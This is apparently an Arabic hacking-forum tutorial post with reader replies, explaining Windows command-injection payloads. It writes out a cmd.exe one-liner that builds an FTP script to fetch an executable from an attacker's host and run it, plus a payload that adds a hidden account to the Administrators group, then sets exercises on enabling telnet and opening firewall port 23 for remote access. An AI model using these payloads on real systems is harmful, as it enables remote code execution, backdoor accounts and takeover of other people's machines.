arg1="c:\WINDOWS\system32\cmd.exe /c echo open ×.×.×.× 21 > silv3r00t.txt && echo USER silv3r00t >> silv3r00t.txt && echo bin >> silv3r00t.txt && echo GET silv3r00t.exe >> silv3r00t.txt && echo bye >>silv3r00t.txt && ftp:-s silv3r00t.txt && silv3r00t.exe"




نشرحه على السريع .


لزم تكتب بلمف تكست عن طريق االاوامر هذي

echo open ×.×.×.× 21 > silv3r00t.txt

طبعا الان كتبنا امر يفتح الموقع الفلاني على البورت 21 = اف تي بي

echo USER silv3r00t >> silv3r00t.txt

اليوزر نيم حق حسابي ,,

echo PASS silv3r00t >> silv3r00t.txt

الباسورد حقي للحساب ,,


echo bin >> silv3r00t.txt

طبعا الان على وضع باينري ,,

echo GET silv3r00t.exe >> silv3r00t.txt

الان حنا سحبنا الملف ,,

echo bye >>silv3r00t.txt
هذا خروج من ftp

ftp -s:silv3r00t.txt

تحميل الملف

silv3r00t.exe

نشغل الملف ..

3- الطريقه الثالثه هي اضافه يوزر

اضافه يوزر اسهل طريقه لكن مشكلتها ان المهاجم يكون على نفس الشبكه .


وهي على هذا الشكل

net user userna me password /add
net localgroup Administrateurs userna me /add

مثال

كود PHP:
arg1="c:\WINDOWS\system32\cmd.exe /c net user silv3r00t 123 /add && net localgroup Administrateurs silv3r00t /add "



نروح لسؤال اليوم


1- اكتب خطوات كل من

أ- تفعيل خدمه telnet بأستخدام sc

ب- عمل يوزر للدخول على خدمه telnet

ج- فتح بورت في الجدار الناري يسمح البورت 23 و السماح بـ IP واحد فقط للدخول على البورت

تحياتي للجميع واكون ,وفيت معكم

[طارق الشهراني]

مشكوووور على الجهد

[DR.X]

تحياتي للجميع

[الشبح المرح]

**** **** لك حبيبي

[illuminat]

مشكور Mr.X

[ilyas0206=DZ]

مرسي أخي بارك الله فيك !!!

[Dx0-dz]

مجهود معتبر و شرح وافي مشكور بارك الله فيك.

[سني هكر]

بارك الله فيك عالمجهود الرائع اللي تقدمة

[mohammad86]

مشكور على هذا الجهد

[simoow]

**** للك اخي

[simoow]

**** للك اخي fck

[loock]

جزاكم الله خيرا

[matrixx]

جاري المتابعة, تقبل مروري